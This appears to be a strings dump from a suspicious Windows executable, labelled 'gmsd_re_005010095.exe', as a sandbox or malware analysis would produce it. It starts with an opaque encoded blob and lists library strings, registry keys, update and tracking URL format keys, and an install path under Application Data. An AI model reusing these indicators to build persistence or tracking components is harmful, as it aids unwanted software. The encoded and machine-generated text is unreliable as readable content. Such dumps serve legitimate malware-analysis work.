SSxYNNy4CCcIxxNrggp]jju_nnv'33anXX3JnnnaSSZ$jjfSggp]VVx0nn13VVOfllAnxxmSjjpEaaVjQQv6UUECxxv0dduLCCr}VVlNmmzOjj8WCCH4qqpUUE(xxzDbbN.wwm@xxPZkkcUbbR^XXe^LLvTQQx7nn6Dmmd-LLyLWWKvnn1Zuu1VFF6xppcEwwZOjjBgLLE=XXH766gFbbw$jjMEmmp`VVm]oo1vXXOibbx766v#ccJ|33T*xx2}00j"xx3sbbRZnnpbHHZIuum/nnq/nnc/ttJ2WWs~ddWfkkeSll5yttp7ddV%oo4JaaR8llHNLLi%vvGlXXI5llxY55R/ooHzUU4Guur.ggC/XXw(XXAJjj2=NNLMbbpJtt3XooKcSSP6QQrAllr8CCs5llCixxf&xxu(wwfNVVAOooGhxxAjSS2@XXn3ww4nFFA?XXe 66I"uus*xxR-CCGBbbVRuuH"335uXX3,55HQlld:HH15uus`ww2-uuJXXXzMXXZ|qqAjnnvVXXTKSSGFqqRfSSr?ggwWnn1NqqLavvrfqqL#mm24nnp:XX2;oo1GbbJQ99ViuuG*nnNNgget00qYjjw|HHH8uuZ5qqJ,QQNWnnf#SSKDjjACoofjVVv-nnw9IIpbccBjnnRCWWJ/VVAUpp3veeE[wwrMnnO/xxz_qqzSSJiccHAqqgAwwNyjj6$ggvd33cjCCd8llBnll1@jjz&nnp0nnU/lldFSS4,xxZ@ddr.wwsYLLJQvvf^NNtCoof}996%QQJRUU1!WW3!qq2LjjJ"NNn=pp2d00LrWWwBNNG^bbx>XXi6ppc4wwZ|SSG|NNc6bb1C66LwCCmmddT)ooN&xxs$ggd3ggE:jj1!RRB#bbNkxxAfttv]LLeDppc/LLa3ggffjjW'llz^llg^kkf"LL5FjjHi00HPuu31nnmWWWf,EEE7WWZ>SSAMmm1!00lqppmixxL)oox"nnI\CCz(jjEOwwfonnEVCCJsuu5=WWB6LLH;XXx7ggyvxxs~ee3fxxKSSSROppKcddu8ccNYjjO&uu4wggV vvNEXXv9bbJGxxM/mmffLLVubbJ]ddfIwwd1qqpavvc)XXP`xxryVVHiuux6ggz*xxvsHHJ(CCG2gggqCCJg66Z vvHtLLtCWWN`NNi[nnG#HHA1QQAALLwPjjf`LLNUSScDNNv'QQGVVVlYbbN6XXonnvvvvfUHHRQuucMVViFXXm:MM1EkkpwXXcFWWzGVVuEoo1{VV83ggHB00iBbbN466mgjjw@008WbbN/ll4 llA,nnPcuux)xxI XXBNNIUXXwLxxbfnnZsbbPrWWN^wwAYttBVEEBJccGINN8%jjfu33U!wwZOqq4JuuZcjjCUggw/11E_ppG~dd8smms[tt8>ttJ!IImXXXv*NNYEjjpgdd4$bbBvww6JQQzIjj8Mww42jjj~WWN7eePTooxPdds#kkdoLLopXXz\SSZxQQH,llqNxxJ1bb6"ww4qddk4ggfV11Exkks>llwnllf_IIMjjj1X11R"ggB-nnswuu1;LLyEWW2)33tMnndsVVu>jjc2ll5}xxv%XXfKllrOXXR&hhG1jjHVppACLLm/jjZwjjU-QQK4aaJ-nnc`LL51jjsgLLsnSS1,jjGGmmJ$IIA8llx$dd1hhhJqnnE%nnpxllmGllwtRRl~nnx_NNy?wwGlggmgWWmddd1cSSw&qqGCXXxxNNi\WWpOxxb4nn3THH50pp40NNkobb2UllluwwcBqqsiggK:ooHPCCf]00UsuueWggw!QQvinnJ(ppsaddJHggx}ttEmww2 NNI@WWcoLLaOggmJnnIfooZDdduvvve9ggs/ww3&jjt\mmedjjA!SSHkllaxmm2SLLsrggcmllhCllwKEEZ?QQ1"IIw,vvvgLLe,bbNa66BfnnJ855A8vvKZnnegjjK?nnM{CCKQqq3*ppw:NNR0nnzsee3>SSHiNNoDxxe3wwJ[bbv{LLNSllH=xxZVxxzpllMjmmx"xxikCCe7VVOhooNrqqb/ggrWXXc>nnx6ggmKWW2gRR5/oo2i11ZjwwfdnnymCCpnqqEjww1Mnn1%llZ2XXd/wwK5llraCCcsLLt{XXe MM5WmmJijjvCoov^xxudXXd5FFNrwwfZ55N?ppw=66e&llA1nnlDwwzHlln1vvx4LLfLXX16XXndnn38SS2~mmc>NNbCXXxnVVv$jj3#VVMBggz|ddA SSf3bbR=ccNlxxmsoopobbEZccH[33P6SSN~ddoAwwJcRRu8nn4 bbNJjjJDRRE^xxeL11A3WWs llCEbbv8nnf6WW1W005yggwoXXV%wwfOMM4#QQckllr#ppBMttUHttJ3ddYDvvc/ddJ{xxJ`VVLthhHA00uTuu3055NvoowEddO$ttmvnnP)jjAHtt8(ttNTNNfEXX4-ggxkoow^001=www-66T0mmfn33mtmmsHddP)jj1ejjg*oo2FbbH]oofuddWOooe/NNiEuuJ6ww6'llfxjja;jjz`xxy7wwmHxxonhhG}FFPxXXHgVVrXXYEllGOnng\jjKYllRruuHTLLuUnnNMaaNPwwBvLLh*hhGbjjyqWW3?FFHHppx,VVO7wwwxxWOpp3iXXLiSSZbFF5EwwG~SS3DwwvM334~mm32qqiuXXNRxxf{llGWxxUExxH/005HXXJq996 wwd7ddBxmmfVxxB!ppe)jji;llvLttH/QQx.qq1Cww2/MM6euuH011Aloo3)nnv|WW4}qqP-ggG~ddr#uuZ5aa1fuue/66Z]llHOddGPnnK?bb2xxxHJggb#ww3AXX1Njj1xLLU2bb2p33PIllc`LLbEpp3KVVzYnnd"ggdsQQfrggfjnnN.uuHPvvdOxxbEQQH2qq5wbbm|xxryll2vwwHaWWBjddC7ooBBddf'bbJ&xxuZXXB\xxw4SSx!ttV[xxv@ee3Jxxv\jjH%llHE661(ppdXnnm5jjveSS4\ppx-ttRRuuxgnnq|ooHCLLoEwwvrddqTSS4"VVvqww3uNNucoo2&NNV}CCzSNNzcbbw4jjYoww3MXXxPjj2>RRBcQQG#VVRYvvwxxxW-oo1:llK/ccNNNb.llJ!nnCmkkvEllVrSSe"nnE&SSHRRmMM63ggp=nnGsttc.gguYkkclllm"wwG[qqR6ggsnee4;ggvvnno>jjJBNNE?WWvjXXv*XXHmxxJ.kkzLqqGDccHk5567jjs7llK>oosTLLNaSS1UllY llG6ooErwwGUjjB7nn2tXXffxxHuxxrOuup-XXw!vvc.bb4cSS3[xxgYnn15ggs5nnwp66TDllBiee2wxxw6VVC|XX2Gnnx*ggv!II1>QQJM66eiCCep00cuxxfJ11Znuux(nno9oo1mLLr|bbJ,XXr&CCs9oo41ppZFeeR>uuZhXXyHSSfhVVf*ppzNqqESww1tnn4!SSHmllq~nnmVllH-xxv$nna%xxNaLLGBvvr:gghXhhJ"nnwcjjfaRR55uufUXXI,hhHOxxdGuup#ll1'ppxJ55Epoof3ddt"bbZ3VVvJmmeXaaP)WWc&xxCfxxA)ddTCQQ19NNwqqaKXXKMddLWbbNi66o}hhN^FFR}xxw{uuH/wwsrtt8FttN xxr5vvJ{UU6Mbbx'nnw4nnd3XX65xxvJMM1MWWJ:00JMbbx%qqT*mm39qqzIjjwjIIR"CCK8xx3!SSKUggnVWWZ'llU{mmGQuuZ*vvpjggN)xxp6NNVkpp4$xxHvbbv9jjI`mmscMMVPvvH*66txWWcrjjU~nncBooRHwwNEllwrllp~llAkSSpgll6mkkeFnncJoo1EeePRvvJB33BJmmHd00v_wwzoNN4bllf2XXtTnn39ddYQxxc_xxM8oofkXXB$SSG#nnfSbbZ9jjZBxxpjllmrllx7SSRKttB`EEBtWWv@66lHggHHLLcgSSwQLLg1SSGhjjT3XXNSMMH{mm3UddeCttvcwwBAkkB0ggE9ggeYuuP`vvw1nnHvbbH9uuPnbbvN33e'QQcMjjINjj4;ddJ5kkr8ggpnmmA]xxk>mm1.IIbAmm14nnW`bbJdNNMwjjzEnnH[ll1%llw/SSHdjjK/uus5llu~ggrPnnMvSSZ2jjg^ww2_uuJnnd,00AQnnxU99EKuuzDwwE>uupRaaE?kkp%wwB9yysKggE/SSJ700JIWWv7RRDlSS2`xxA'XXJ6xxA2ttGRMMB_SSr/ggTznnBy666 QQ4AxxVQQQJ;llI1nnvoddYpnnf>33Nubbvf66H1CCvr003LWWfzNNMqWWmw66G%QQ2u11B8yysPggA{nnvlXXDVWWf2IIG}XXxa00GQQQc>qqYGCCmntt8]ttNGjjT^nnKBll4vbbc ggNrccd9RRw$XXchllTySSJxNNV#QQr-uuBryys~ggAlnnv XXD9SS4qxxE)nnds00O3nnc-HHB%kkB@gg3rSSflllVeXXfrxx14XXclllT?SSJ NNV0QQf3xxZ*WWrLaaB(yysDgg1ySSJ`ddG"nnx"00U8QQ2]XXD1SS2-xxAPXXJyxxAuttGUMMBLLY mmx^66Z/QQKXVVJgwwpqNNpmQQ2BXXo`WWx'ww3kXXp,uu2)CCKVXXq7QQwUoo6PXXx=VVgfQQwRqqC'vvJ^HHVDmmB8MMA;jj1*VVYallHLqq8ASSxnNNLillN^xxGLWWH0MM5doo3RVVzII1~XXeQQe.llhuggK4SS3Ellvhll49nnw2NNuVkkfruu1wllGNjj5[nneKSSH8XX2C33zIxx38dd2oCCH*RRgCllpENNT6ggf=dd5\QQ1OXX3njjr`VVBGCCv]00C|ggrjlliojjfaNN3{jjm3llb;jjBnlly{XXH.ddV!nnv#nnvcwwJ511VMuuziSSPDSSdmddmGjj1BIIH!vvd(NNE!jjw7jjI&QQrGttA(mmGlllN nnv 33o!XXw"00Z!XX4*NNJoccKfnnV/wwzUqqq&oo1OIIy[kkslddL3llr|ww3~bbGXwwEsjjK$aa6BwwNkjjeqxxK=VVx2QQZlggd8ggz9HH2;bbw@00lmuuZPNNAOllwFLLutXXZPllr&xxvaggm|ggfPXXZhQQr%ggZ4WW2dgg8wWWd-jjAMoor|ooZ>mmG jjMhggwyjjsPXXZ`XX6YoospLLf_XX2SSwuqq6@pp2/NNI8SSw~uu5&ooHVqqRxggfZ33q0ggpqVVw]SS3_66qluuNGXXC6xx4rVVMquuB]ttUmttK5HH1Wmm4eggY'QQeZxxb!uu2ljjZKxxA@tt8 ttKHFFVbvvvJxx4kbbNEggyiggmldda ttwP33l|mmNZNNhpXX3XjjooSSHmEEJPjjd/NNO^vvNobb5uppxzxxbhllJDnnVASScoeeRsXXKcggA)ppep00I-vvHKLLJmnnKoVVJ%mmJ)nnYjjjNDllL9hhHb6624mmG3ddo~mm4JMM6Rmm2~XXgwggJLxxv$nnv[LLjexx2x33e"ooJ;tt5~SS3ojjH.QQ2>ddiSSS2B115 llr;ggUaQQpuqqw~ppAIeePVjjv`00u8WWwzddmOttx0qqR4mmzhggHBSSx>66d~oopRXX4 llvrXX4Jxx3mqq6eQQrFVVa*kkvd33cnSS4>xx4?WWZ?nnmQmm1SSS6(xxfEnnW nnHYllm8WWZBNNy@pppreeHCooceddIsoovtMM3'CCGRbbVobb1$xxG'WWxnNNB_ccHxNN48nnx_LLC~wwx4NNu,CCH-dd8ajjz:nnjYCCf`RRvLll2Ullsjvvs7ddA>SSN>aaZ jjdcxxKgll2>RR5aCCwPXXyhggJ!IIBuoo3AXXOill1033cjggr"xxvYuue`nnbtWWz2ttZCpp3BttZTnnHy00V7ppwI00lGppK;ttZuvvf`NNu\oofnjjlzXXfz66p\jj4?bb2dWWNMgg5LmmH0II5OSS1.66lAnne300v)XXdy6659oo1o33OUnnNajjCcmm1IRR4guuc LLg ppzUjju?ggr1NNY7ppz9XXKIuuvlNN5.bbvAHH4#ggKKNN2Lmm3FSS4ggJr334TQQc8jjm/kkeRggCuvvp2ddG6bbc|nne7ttckxxIapp1XII4cxxe&RRn8WWvwxxLMpp2RnnfZppeMLL1yll3oVVRMwwH]jjfRuur]tt6zwwHEjjO*SSZUggbKuu27NNG#xxzvjjV:ooebqqcUSSJlIIRAccKRbbA~QQZJNNc ggJKRR8~SSv8NNf3jjmAeeV xxxNllf`xxe)NNlBWWvJ66C=kkr`VV4*wwN3ddb}uue)338*bbN6XXNSvvvUllxXnnw`nnBqmm3WddrXmmz7llj~oo1ullLIWWfBRRr)nnxvuuJ6wwZbtt1vmmw"SS1/xxz2llBhQQrvjjPYwwe}nnc>nnA]xxU/jjAhgg0PADqvDpUyPECwGtYOOMQzIxazdjSsteZFxTKFtXVrXnLoMPsesorZjZuopbsPcSlISWTAIsvrOOSWuKRrAeroDjeXJwnPFnKtmaTqgySCpnOiyNLSyGKd_LDnWwMiPA
truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
truePPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
066H6
066H6
5]5R5X5
5]5R5X5
;#;';,;4;
;#;';,;4;
7!707@7{7
7!707@7{7
1-2Z2o2}2a3q3
1-2Z2o2}2a3q3
3?3p3
3?3p3
2)2.282>2
2)2.282>2
2 2,232=2
2 2,232=2
;%;2;^;~;
;%;2;^;~;
;';1;7;[;
;';1;7;[;
6!6%6)6-6?6
6!6%6)6-6?6
6m6
6m6
?"?&?*?.?2?@?
?"?&?*?.?2?@?
>>]>|>
>>]>|>
11X1
11X1
6-7T7p7}7
6-7T7p7}7
7*868[8~8
7*868[8~8
1-2
1-2
4/5
4/5
7%7S7w7
7%7S7w7
8%8S8[8
8%8S8[8
4/555_5{5(6
4/555_5{5(6
8%9x9
8%9x9
7 7$7(7,7074787
7 7$7(7,7074787
>#?2?;?_?
>#?2?;?_?
5 5$5(5,5054585
5 5$5(5,5054585
? ?$?(?,?0?4?
? ?$?(?,?0?4?
2-383t3}3
2-383t3}3
7y7D7
7y7D7
:"
:"
3-3Q3}3
3-3Q3}3
3-3P3}3
3-3P3}3
6-6Q6}6
6-6Q6}6
: :$:(:,:
: :$:(:,:
4 4$4(4,40444
4 4$4(4,40444
7 7$7(7,7074787
7 7$7(7,7074787
3 3$3(3,30343
3 3$3(3,30343
4 4$4(4,4044484
4 4$4(4,4044484
5 5$5(5,5054585
5 5$5(5,5054585
= =$=(=,=0=4=8=
= =$=(=,=0=4=8=
8 8$8(8,8084888
8 8$8(8,8084888
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1 1(141
1 1(141
2$2,282\2|2
2$2,282\2|2
2(202
2(202
4(404
4(404
8 8$8,8@8`8
8 8$8,8@8`8
9 9@9`9|9
9 9@9`9|9
.----/01/01/01
.----/01/01/01
{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|
{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|{|
{|{|{|{|{|{|{|
{|{|{|{|{|{|{|
File%d
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
KERNEL32.DLL
KERNEL32.DLL
%s%s.dll
%s%s.dll
E%s (%s:%d)
E%s (%s:%d)
%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
lX-X-x-XX-XXXXXX
Advapi32.dll
Advapi32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
Ecomctl32.dll
Ecomctl32.dll
Ecomdlg32.dll
Ecomdlg32.dll
Eshell32.dll
Eshell32.dll
accKeyboardShortcut
accKeyboardShortcut
wuser32.dll
wuser32.dll
hhctrl.ocx
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
commctrl_DragListMsg
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
kernel32.dll
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
PTF://
PTF://
hXXp://
hXXp://
@WININET.DLL
@WININET.DLL
HTTP/1.0
HTTP/1.0
mfcm100u.dll
mfcm100u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
OLEAUT32.DLL
OLEAUT32.DLL
%sCLSID\%s
%sCLSID\%s
%d.%d
%d.%d
TYPELIB\%s
TYPELIB\%s
CLSID\%s
CLSID\%s
CLSID\%s\%s
CLSID\%s\%s
SHELL32.DLL
SHELL32.DLL
lXXxXXXXXXXX
lXXxXXXXXXXX
dwmapi.dll
dwmapi.dll
UxTheme.dll
UxTheme.dll
eShell32.dll
eShell32.dll
%s:%x:%x:%x:%x
%s:%x:%x:%x:%x
r%s\shell\open\%s
r%s\shell\open\%s
%s\shell\print\%s
%s\shell\print\%s
%s\shell\printto\%s
%s\shell\printto\%s
%s\DefaultIcon
%s\DefaultIcon
%s\ShellNew
%s\ShellNew
%s\ShellEx
%s\ShellEx
\{8895b1c6-b41f-4c1c-a562-0d564250836f}
\{8895b1c6-b41f-4c1c-a562-0d564250836f}
ddeexec
ddeexec
Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f{8895b1c6-b41f-4c1c-a562-0d564250836f}
f{8895b1c6-b41f-4c1c-a562-0d564250836f}
{E357FCCD-A995-4576-B01F-234630154E96}
{E357FCCD-A995-4576-B01F-234630154E96}
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers
%s\ShellEx\%s
%s\ShellEx\%s
COMCTL32.DLL
COMCTL32.DLL
USER32.DLL
USER32.DLL
%sMFCToolBar-%d%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBar-%d
ShortcutKeys
ShortcutKeys
%sMFCToolBarParameters
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
TOOLBAR_RESETKEYBAORD
IDB_OFFICE2007_RIBBON_KEYTIP_BACK
IDB_OFFICE2007_RIBBON_KEYTIP_BACK
KEYTIP
KEYTIP
%sKeyboard-%d
%sKeyboard-%d
KeyboardManager
KeyboardManager
%sCommandManager
%sCommandManager
MSG_CHECKEMPTYMINIFRAME
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sDockingManager-%d
propsys.dll
propsys.dll
%2x%2x%2x
%2x%2x%2x
xxx
xxx
%s(%i)
%s(%i)
MFCLink_UrlPrefix
MFCLink_UrlPrefix
MFCLink_Url
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
&%d %s
&%d %s
%s-%d
%s-%d
%sMDIClientArea-%d
%sMDIClientArea-%d
Zf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
Zf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d%x
%sBasePane-%d
%sBasePane-%d
%sMFCRibbonBar-%d%x
%sMFCRibbonBar-%d%x
%sMFCRibbonBar-%d
%sMFCRibbonBar-%d
%sPane-%d%x
%sPane-%d%x
%sPane-%d
%sPane-%d
windows
windows
ShowCmd
ShowCmd
QHex={X,X,X}
QHex={X,X,X}
1&0 %s
1&0 %s
X%sMFCOutlookBar-%d%x
X%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sMFCOutlookBar-%d
Yf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
Yf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olefact.cpp
Ymsctls_hotkey32
Ymsctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
@%c%d%c%s
@%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
%sDockablePaneAdapter-%d
ENABLE_KEYS
ENABLE_KEYS
KEYS_MENU
KEYS_MENU
KEYS
KEYS
[%d, %d, %d
[%d, %d, %d
%d, %d
%d, %d
[RICHED32.DLL
[RICHED32.DLL
RICHED20.DLL
RICHED20.DLL
\%s %s
\%s %s
\f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
\f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
%s-Bar%d
%s-Bar%d
%s-Summary
%s-Summary
MRUDockLeftPos
MRUDockLeftPos
Bar#%d
Bar#%d
RGB(%d, %d, %d)
RGB(%d, %d, %d)
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
%sMFCTasksPane-%d
]f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockcont.cpp
]f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockcont.cpp
^f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelink.cpp
^f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olelink.cpp
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
ADVAPI32.DLL
ADVAPI32.DLL
Windows XP
Windows XP
Windows Server 2003
Windows Server 2003
Windows Vista
Windows Vista
Windows 98
Windows 98
Windows Me
Windows Me
Windows 2000, Windows NT 4.0, or Windows 95
Windows 2000, Windows NT 4.0, or Windows 95
Win32s on Windows 3.1.
Win32s on Windows 3.1.
OS: %s, SP: %s, STATE:%d, HOME:%s
OS: %s, SP: %s, STATE:%d, HOME:%s
%8x-%4x-%4x-%2x%2x-%2x%2x%2x%2x%2x%2x
%8x-%4x-%4x-%2x%2x-%2x%2x%2x%2x%2x%2x
%s-%s
%s-%s
%s: %d
%s: %d
%s: %s
%s: %s
HttpOpenRequest failed: %lu
HttpOpenRequest failed: %lu
HttpSendRequest failed: %lu
HttpSendRequest failed: %lu
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
4294967295
4294967295
user32.dll
user32.dll
%s\%s
%s\%s
X-X-X-X-X-X
X-X-X-X-X-X
upd_url_format
upd_url_format
trace_url_format
trace_url_format
reg_supd_key
reg_supd_key
Software\Wnkey
Software\Wnkey
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.exe
All Files (*.*)
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
%s [Recovered]
gmsd_re_005010095.exe_1336:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
.FGy"
.FGy"
uÂ&u
uÂ&u
u.VWh
u.VWh
8sqliu
8sqliu
u.Wh\
u.Wh\
2 34 567
2 34 567
%STUV
%STUV
F><.tn>
F><.tn>
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
u$SShe
u$SShe
t'SShl
t'SShl
SSSSh
SSSSh
j%XtL9E
j%XtL9E
tAHt.HHt
tAHt.HHt
FtPW
FtPW
SSh@B
SSh@B
FTCP
FTCP
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
8Y%u-
8Y%u-
>.uEV
>.uEV
RR R!"RR#$RRRR%&'RRR(R)*R RRR,-.RR/0123RRRR4R5RRRRRRR6RRRRRR789:;?@ABCDERRRRFRRRRGHRRRRRIRRJKRRRRRLMRRRNNRRORRRRRRRRRPRRQ
RR R!"RR#$RRRR%&'RRR(R)*R RRR,-.RR/0123RRRR4R5RRRRRRR6RRRRRR789:;?@ABCDERRRRFRRRRGHRRRRRIRRJKRRRRRLMRRRNNRRORRRRRRRRRPRRQ
!"EEE#E$Eî&E'()EEEE*EEEEEEEE EEEEEEEEEEEE,EE-.EEEEEEEEEEE/E0EEEEEEEEEEEEEE12EE345EE6789:EEEEEEEE;?EE@EEEEEABCEEEEED
!"EEE#E$Eî&E'()EEEE*EEEEEEEE EEEEEEEEEEEE,EE-.EEEEEEEEEEE/E0EEEEEEEEEEEEEE12EE345EE6789:EEEEEEEE;?EE@EEEEEABCEEEEED
%u$Vj%
%u$Vj%
tCPh
tCPh
t.Gj:W
t.Gj:W
FTPG
FTPG
FTPj
FTPj
.EKSWU
.EKSWU
SHA1 block transform for x86, CRYPTOGAMS by
SHA1 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
DlSHA512 block transform for x86, CRYPTOGAMS by
DlSHA512 block transform for x86, CRYPTOGAMS by
|$@3|$
|$@3|$
Camellia for x86 by
Camellia for x86 by
6-9'6-9'
6-9'6-9'
$6.:$6.:
$6.:$6.:
*?#1*?#1
*?#1*?#1
>8$4,8$4,
>8$4,8$4,
AES for x86, CRYPTOGAMS by
AES for x86, CRYPTOGAMS by
RC4 for x86, CRYPTOGAMS by
RC4 for x86, CRYPTOGAMS by
Montgomery Multiplication for x86, CRYPTOGAMS by
Montgomery Multiplication for x86, CRYPTOGAMS by
FtPS
FtPS
CB_ColorKey
CB_ColorKey
CB_Keydown
CB_Keydown
CB_Keyup
CB_Keyup
()$^.* ?[]|\-{},:=!
()$^.* ?[]|\-{},:=!
CNotSupportedException
CNotSupportedException
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
CCmdTarget
CCmdTarget
RegDeleteKeyExW
RegDeleteKeyExW
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
operator
operator
GetProcessWindowStation
GetProcessWindowStation
portuguese-brazilian
portuguese-brazilian
F%D,3
F%D,3
dbghelp.dll
dbghelp.dll
%Y-%m-%dT%H:%M:%SZ
%Y-%m-%dT%H:%M:%SZ
Could not resolve %s: %s; %s
Could not resolve %s: %s; %s
getaddrinfo() failed for %s:%d; %s
getaddrinfo() failed for %s:%d; %s
init_resolve_thread() failed for %s; %s
init_resolve_thread() failed for %s; %s
About to connect() to %s%s port %ld (#%ld)
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
IDN support not present, can't parse Unicode domains
Protocol %s not supported or disabled in libcurl
Protocol %s not supported or disabled in libcurl
malformed
malformed
:]://%[^
:]://%[^
[^:]:%[^
[^:]:%[^
http_proxy
http_proxy
%5[^:@]:%5[^@]
%5[^:@]:%5[^@]
:%5[^@]
:%5[^@]
Port number too large: %lu
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
%s://%s%s%s:%hu%s%s%s
;type=%c
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
